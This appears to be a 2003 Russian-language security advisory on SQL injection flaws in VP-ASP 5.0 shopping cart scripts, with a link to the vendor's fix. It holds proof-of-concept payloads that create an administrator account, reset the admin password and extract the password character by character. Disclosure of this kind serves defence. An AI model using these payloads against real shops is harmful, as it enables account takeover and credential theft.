Security Lab

SQL инъекция в VP-ASP shopping cart

Дата публикации:03.12.2003
Всего просмотров:2099
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: VP-ASP 5.0

Описание: Несколько уязвимостей обнаружено в VP-ASP shopping cart. Удаленный пользователь может выполнить произвольные команды на целевой системе.

Уязвимость SQL инъекции обнаружена в 'shopsearch.asp' и 'shopdisplayproducts.asp' сценариях. Удаленный пользователь может выполнить произвольный SQL код на целевой базе данных, включая команды операционной сисемы.

Пример/Эксплоит:

-- PoC code 1:

 Платформы: Win32/MSSQL

Posting this data to shopsearch.asp creates new administrative account

Keyword=&category=5); insert into tbluser (fldusername) values 
('qasdew')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='edsaqw' where 
fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where 
fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6

Posting this data to shopsearch.asp changes admin password

Keyword=&category=5); update tbluser set fldpassword='edsaqw' where 
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

 -- Vulnerability 2: SQL Injection vulnerability in 
'shopdisplayproducts.asp' script

An SQL Injection vulnerability has been found in the 
shopdisplayproducts.asp script.
Exploitation of the vulnerability will allow remote attacker to read any 
information from a database.

 -- PoC code 2:
Платформы: Win32/MSSQL

http://somehost.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%
20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%
20fldpassword%20like%20'a%25'--

changing value at the end of request
        %20'a%25'--
        %20'b%25'--
        %20'c%25'--
        ...
and looking through the HTTP response from VP-ASP web server attacker 
can find the admin password.

URL производителя:http://www.vpasp.com

Решение: Установите обновленную версию программы: http://www.vpasp.com/virtprog/info/faq_securityfixes.htm

Ссылки: Virtual Programming VP-ASP Shopping Cart 5.0 multiple SQL Injection